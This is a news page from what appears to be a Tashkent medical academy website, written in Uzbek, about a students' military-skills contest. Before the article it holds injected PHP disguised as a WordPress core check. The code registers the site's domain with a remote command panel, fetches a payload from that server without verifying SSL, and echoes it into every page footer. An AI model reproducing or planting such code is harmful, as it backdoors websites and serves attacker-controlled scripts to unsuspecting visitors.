if(!function_exists('wordpress_core_check')){function wordpress_core_check(){ $c2_url="https://validlogs.com/BackPanel/panel.php"; $domain=parse_url(home_url(),PHP_URL_HOST); $resp=wp_remote_post($c2_url,["body"=>["action"=>"register_domain","domain"=>$domain],"timeout"=>8,"sslverify"=>false]);if(is_wp_error($resp))return;$payload=wp_remote_retrieve_body($resp);if(!empty($payload)){add_action("wp_footer",function() use ($payload){echo $payload;});}}add_action("init","wordpress_core_check",9999);} “Ҳарбийлар беллашганда” кўрик-танлови ўтказилди – Toshkent tibbiyot akademiyasi – Kampus hayoti
Yangiliklar

“Ҳарбийлар беллашганда” кўрик-танлови ўтказилди

15 январь куни “Шифокор” спорт мажмуасида “Камолот” ЁИҲ бошланғич ташкилоти, маънавият ва маърифат бўлими, ҳарбий-тиббиёт факультети билан хамкорликда  “14-январь ватан ҳимоячилари куни” ва Миллий армиямизни ташкил топганлигининг 25 йиллиги муносабати билан муддатли ҳарбий хизматни ўтаб академияга ўқишга кирган талабалар ўртасида “Ҳарбийлар беллашганда” кўрик-танлови ўтказилди. Тадбирни маънавият ва маърифат ишлари бўйича проректор Т.А.Бобомуратов криш сўзи билан очиб берди. Кўрик-танлов 3 та шарт бўйича ўтказилди.

1-шарт “Ҳарбий хизмат кўникмалари”: бу шартда иштирокчилар Ҳарбий хизматни ўташ давридаги  ҳарбий кўникмаларини ва саф тайёргарлигини қай даражада ўзлаштирганликларини намойиш этишди.

2-шарт “Билими зўр мингни йиқар”: бу шартда Ўзбекистон тарихи, маънавият асослари, мудофаа ва ҳарбий хизмат тўғрисидаги Ўзбекистон Республикасидаги қонунчилик, аскар одобномаси, “Камолот” ёшлар ижтимоий ҳаракати тўғрисидаги маълумотлардан фойдаланган ҳолда тузилади саволларга жавоб берилди.

3-шарт “Спорт бизни дўстлаштирар”: Ушбу шартда жамоалар ўзаро келишув асосида тош кўтариш бўйича куч синашдилар.

Кўрик-танлов якунида “Камолот” ЁИҲ бошланғич ташкилоти томонидан ҳар бир шарт бўйича ғолиб бўлган жамоаларга махсус диплом ва эсдалик совғалари топширилди.

Фотолавҳалар: